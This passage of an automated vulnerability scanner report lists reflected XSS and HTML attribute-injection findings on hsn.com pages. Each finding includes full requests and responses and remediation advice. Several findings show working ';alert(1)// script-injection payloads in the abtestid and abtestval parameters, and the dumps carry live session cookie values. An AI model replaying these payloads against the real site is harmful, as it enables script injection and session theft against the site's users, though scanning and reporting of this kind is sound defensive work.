1.13. http://beauty.hsn.com/wei-east-wrinkle-relief-system_p-6119231_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://beauty.hsn.com
Path:   /wei-east-wrinkle-relief-system_p-6119231_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31632"%20a%3db%20ce060bae64a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31632" a=b ce060bae64a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wei-east-wrinkle-relief-system_p-6119231_xp.aspx?31632"%20a%3db%20ce060bae64a=1 HTTP/1.1
Host: beauty.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:34:46 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9RW%2bljNKwmcM93Y0ECHntq&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fbeauty.hsn.com%3a80%2fwei-east-wrinkle-relief-system_p-6119231_xp.aspx%3f31632%22%2520a%253db%2520ce060bae64a%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=C0JsMK0xXtyD%2bvwTPhvm5A%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:47 GMT; path=/
Set-Cookie: sessionid=id=luueilc3XEZUPD6SY3MU%2bw2I2xGuXoAaBiMDdQkAxmcRmPfiOxqWVw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=9DoHr9mBlLty%2fVC8o70d4r2zWOHO%2fDy10peK2%2bqA8Z42hZW5Cx28%2bg%3d%3d&abtid=O51WPMOe%2fRE0phsDmmFtRFy0SUi3NvBy14mlogPdOQnODRxYoEAtcg%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:34:46 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:34:47 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=QPuHs32rJZrtn6DTw2%2fORgv63udGAPmXufhh3T0ezgU%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=48AFF7844FE393B56CF27E9AB4325A81; domain=.hsn.com; path=/
Set-Cookie: TLTHID=48AFF7844FE393B56CF27E9AB4325A81; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:34:46 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 143590


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
url="http://www.hsn.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://beauty.hsn.com/wei-east-wrinkle-relief-system_p-6119231_xp.aspx?31632" a=b ce060bae64a=1&cm_mmc=sharingsite*email*PD*961662"
shareTitle="Wei East Wrinkle Relief System at HSN.com"
cmspTag="cm_sp=share*email*PD"
style="background-position:
...[SNIP]...

1.14. http://cnt.hsn.com/alerts/Js [abtestid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cnt.hsn.com
Path:   /alerts/Js

Issue detail

The value of the abtestid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c18ab'%3balert(1)//3034031152f was submitted in the abtestid parameter. This input was echoed as c18ab';alert(1)//3034031152f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alerts/Js?abtestid=c18ab'%3balert(1)//3034031152f&abtestval=B&v148 HTTP/1.1
Host: cnt.hsn.com
Proxy-Connection: keep-alive
Referer: http://www.hsn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; CustState=Now=12/10/2010 2:30:50 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; TLTSID=AD2EA45D444C5361509642BD6C0C11B2; TLTHID=AD2EA45D444C5361509642BD6C0C11B2

Response

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 19:32:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 5236


var cacheDuration = 5;
var ABTestId = 'c18ab';alert(1)//3034031152f';
var ABTestValue = 'B';


function GetNbrOfNewAlerts( deliveryMethod, callback )
{

if ( ABTestId == '23' && ABTestValue != '' )
{
try
{
var ale
...[SNIP]...

1.15. http://cnt.hsn.com/alerts/Js [abtestval parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cnt.hsn.com
Path:   /alerts/Js

Issue detail

The value of the abtestval request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78c3b'%3balert(1)//16f5180c2e3 was submitted in the abtestval parameter. This input was echoed as 78c3b';alert(1)//16f5180c2e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alerts/Js?abtestid=&abtestval=B78c3b'%3balert(1)//16f5180c2e3&v148 HTTP/1.1
Host: cnt.hsn.com
Proxy-Connection: keep-alive
Referer: http://www.hsn.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; customer=ksUrl=P8uIrOOpnufElB5p%2f3Qpx8DMkYnb0AloWJeRNCi8Q8BW7zdnvpco2w%3d%3d&Look_Up_=CE_1; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; CustState=Now=12/10/2010 2:30:50 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; TLTSID=AD2EA45D444C5361509642BD6C0C11B2; TLTHID=AD2EA45D444C5361509642BD6C0C11B2

Response

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 19:32:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 5236


var cacheDuration = 5;
var ABTestId = '';
var ABTestValue = 'B78c3b';alert(1)//16f5180c2e3';


function GetNbrOfNewAlerts( deliveryMethod, callback )
{

if ( ABTestId == '23' && ABTestValue != '' )
{
try
{
var alertTrackingCookie = ReadCoo
...[SNIP]...

1.16. https://cnt.hsn.com/alerts/Js [abtestid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cnt.hsn.com
Path:   /alerts/Js

Issue detail

The value of the abtestid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b7b8'%3balert(1)//351f1c83e16 was submitted in the abtestid parameter. This input was echoed as 5b7b8';alert(1)//351f1c83e16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alerts/Js?abtestid=5b7b8'%3balert(1)//351f1c83e16&abtestval=B&v148 HTTP/1.1
Host: cnt.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TaazABUser=true; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 19:49:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 5239


var cacheDuration = 5;
var ABTestId = '5b7b8';alert(1)//351f1c83e16';
var ABTestValue = 'B';


function GetNbrOfNewAlerts( deliveryMethod, callback )
{

if ( ABTestId == '23' && ABTestValue != '' )
{
try
{
var ale
...[SNIP]...

1.17. https://cnt.hsn.com/alerts/Js [abtestval parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://cnt.hsn.com
Path:   /alerts/Js

Issue detail

The value of the abtestval request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a40e7'%3balert(1)//66b5c1a7527 was submitted in the abtestval parameter. This input was echoed as a40e7';alert(1)//66b5c1a7527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /alerts/Js?abtestid=&abtestval=Ba40e7'%3balert(1)//66b5c1a7527&v148 HTTP/1.1
Host: cnt.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TaazABUser=true; __utmv=94391299.B; sitesession=o=esearch; mscssid=id=iExgNTNr0TNR4KT%2f5nWyYD9J6CUEJP05OB7Gq3uzgr21yIY%2b%2f7KCHA%3d%3d&abtid=Z1y1O2Wx7Tjmm31iwnqIK9rKFZDN0DnAm6FwDT3N9jpWeVHhWc9cXg%3d%3d&Look_Up_=CE_1; __utmz=94391299.1292009442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CoreAt=90028889=1|0|0|0|0|0|0|0|0|0|0|3|1|1292009445||&; TLTHID=50D51C6141D4048D3DAB44B6B7C991C7; customer=ksUrl=RVwtpbjDdY5%2bW9Wphwke9SnTqSux1ZyoKTQPzYbvJZk%2bS3P28VZzHv1DKWRE8Cbi0%2bf43wWRedlx84PHSSXVRkOUXAREsRGQ4kLtl8CWpiHZo7Ny973JCPB3o%2bLQBJye3tzF69C5bO421yv8%2bBi%2fKxF5fzZW0lbi4JQeipFIzM5nfH29l2hKpmWbpQn5gY06&Look_Up_=CE_1&email=; sessionid=id=vneYae8DsJOq6iQ1NbT9W5m%2fhjkb%2fItfuYp9RnwK28gXd9rFhMTCAw%3d%3d&Look_Up_=CE_1; bandwidth=1484; CustState=Now=12/10/2010 2:31:30 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=rWQVMUrBjylxsrbqYH02xc5IDsO2ukwGTYVZjUW0d8w%3d&Nickname=&IsBanned=; custPref=persistentBar=true; __utma=94391299.504240029.1292009442.1292009442.1292009442.1; abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; __utmc=94391299; __utmb=94391299.20.10.1292009442; partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; newAlerts=0; TLTSID=AD2EA45D444C5361509642BD6C0C11B2;

Response

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 19:49:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 5239


var cacheDuration = 5;
var ABTestId = '';
var ABTestValue = 'Ba40e7';alert(1)//66b5c1a7527';


function GetNbrOfNewAlerts( deliveryMethod, callback )
{

if ( ABTestId == '23' && ABTestValue != '' )
{
try
{
var alertTrackingCookie = ReadCoo
...[SNIP]...

1.18. http://jewelry.hsn.com/colleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://jewelry.hsn.com
Path:   /colleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3091"%20a%3db%20fe823b8a846 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3091" a=b fe823b8a846 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /colleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx?b3091"%20a%3db%20fe823b8a846=1 HTTP/1.1
Host: jewelry.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=A&30=A&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=A; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:53:03 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy%2bT%2bTn8LUZuIGu4LbgFm8nV&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fjewelry.hsn.com%3a80%2fcolleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx%3fb3091%22%2520a%253db%2520fe823b8a846%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=cD%2fnNusgz4g3%2fr6qt%2bjUbA%3d%3d&tz=t5GsBRyIAi4%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:03 GMT; path=/
Set-Cookie: sessionid=id=VdqpLuvM84LkxUyqvjNHBjaKJfqEHr9fe7eSFOh55WzBOCtSYIC6mA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=45bE231NN%2bO5%2fOawg6dr8lNM9JVVy7F6Z5WnoI4lrNF7lpRsf5%2fxPQ%3d%3d&abtid=mSPs7BXKsEg0y8whbNI57ey%2fCu0vLLcE8o5D%2fiyFv4BdrR6APltgbA%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:03 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:53:04 PM&signedIn=false&bagCount=0&wishCount=0&abValue=A; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=p84mE4MLsmcPWZOIR%2fOqj7XZKHF83X7ue98YKpV3HiI%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=F0A4D18449740518B30F8A8D4EBDBF95; domain=.hsn.com; path=/
Set-Cookie: TLTHID=F0A4D18449740518B30F8A8D4EBDBF95; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:53:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 139463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
n.com/com/email_suggestion/default.aspx?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://jewelry.hsn.com/colleen-lopez-moroccan-style-bib-necklace-and-earrings-set_p-5766782_xp.aspx?b3091" a=b fe823b8a846=1&cm_mmc=sharingsite*email*PD*567865"
shareTitle="Colleen Lopez Moroccan-Style Bib Necklace and Earrings Set at HSN.com"
cmspTag="cm_sp=share*email*PD"

...[SNIP]...

1.19. http://kitchen-dining.hsn.com/main-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kitchen-dining.hsn.com
Path:   /main-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b05ac"%20a%3db%20bcd9487a494 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b05ac" a=b bcd9487a494 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /main-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx?b05ac"%20a%3db%20bcd9487a494=1 HTTP/1.1
Host: kitchen-dining.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:53:34 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9TMIyM0UbX8npnibH2vLZO&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fkitchen-dining.hsn.com%3a80%2fmain-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx%3fb05ac%22%2520a%253db%2520bcd9487a494%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=RZBfo6yE73iKW%2f3sW%2fdGxQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:34 GMT; path=/
Set-Cookie: sessionid=id=CdUGU2Wn4695WRUR0dJsRWiE81t%2bozBEsj9TZf7ILubPBXA1rvIyUQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=ijnEcmL0LeSYnSdgZDWVtn5I%2feZcEGoIh%2bt%2bjK7aeMouZMGn%2bkFmZg%3d%3d&abtid=9u2rxs6CrHfymdFbU0vPxE4wpsUD6e9UGzYBzskq4PNk8QK2nXD9VQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:34 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:53:34 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
Set-Cookie: BlogState=IsAuth=u1VtG%2fXmYLk%3d&TOS=&Id=l111hy1OCvjYIDG%2f4xivHzT9y%2fIz7YVpD69OuT83bqI%3d&Nickname=&IsBanned=; domain=.hsn.com; path=/
Set-Cookie: TLTSID=9CEE2A214C9859B6C83CA5992974FC0A; domain=.hsn.com; path=/
Set-Cookie: TLTHID=9CEE2A214C9859B6C83CA5992974FC0A; domain=.hsn.com; path=/
Date: Fri, 10 Dec 2010 19:53:34 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 131737


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00__Header1">
<me
...[SNIP]...
px?pop=1&url=__URL__&title=__TITLE__"
shareUrl="http://kitchen-dining.hsn.com/main-street-cupcakes-12-count-vanilla-with-chocolate-chip-cookie-dough-half-baked-gourme_p-5590079_xp.aspx?b05ac" a=b bcd9487a494=1&cm_mmc=sharingsite*email*PD*494128"
shareTitle="Main Street Cupcakes 12-count Vanilla with Chocolate Chip Cookie Dough &quot;Half-Baked&quot; Gourme at HSN.com"
cmspT
...[SNIP]...

1.20. http://kitchen-dining.hsn.com/waggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kitchen-dining.hsn.com
Path:   /waggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b582f"%20a%3db%200ed7d85e4ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b582f" a=b 0ed7d85e4ed in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /waggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx?b582f"%20a%3db%200ed7d85e4ed=1 HTTP/1.1
Host: kitchen-dining.hsn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR LAW CURa ADMa DEVa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Set-Cookie: abtests=1=B&2=B&4=B&5=B&6=B&7=B&12=B&13=B&16=B&17=B&23=B&25=B&28=B&30=B&31=C&38=B&39=B&40=B&41=B&42=A&43=A&44=B&45=B; domain=hsn.com; path=/
Set-Cookie: partnerpromo=HsnMobileDevice=yoYhJRt9oTAMFluM%2fuyUdQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 11-Dec-2010 19:53:29 GMT; path=/
Set-Cookie: customer=ksUrl=lsLq3Cu4zy9KjsDCrDb9QeuVzUnYkloJ&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: sitesession=pdPage=http%3a%2f%2fkitchen-dining.hsn.com%3a80%2fwaggoner-chocolates-world-of-chocolate_p-3703923_xp.aspx%3fb582f%22%2520a%253db%25200ed7d85e4ed%3d1; domain=.hsn.com; path=/
Set-Cookie: myhsn=LastViewed=Kasv7VOlF1Oj%2btWnRF6IVw%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:29 GMT; path=/
Set-Cookie: sessionid=id=QOTkHUiQ%2bKMkMSohcDbOxENrQYeb1ppbpwRvm2ZPQksg4k6p1%2fdceQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; path=/
Set-Cookie: mscssid=id=9FNOERDbbnPpf2cHMJTA2ygGKSgKM6h3VPkBz9itlx8u2Vil0u2VOA%3d%3d&abtid=w%2btpG4PBJruI3hugJUejcicr%2b8EzVB1W%2bjD3Pe72MTdmSAIN1yIYNQ%3d%3d&Look_Up_=CE_1; domain=.hsn.com; expires=Sat, 10-Dec-2011 19:53:29 GMT; path=/
Set-Cookie: CustState=Now=12/10/2010 2:53:29 PM&signedIn=false&bagCount=0&wishCount=0&abValue=B; domain=.hsn.com; path=/
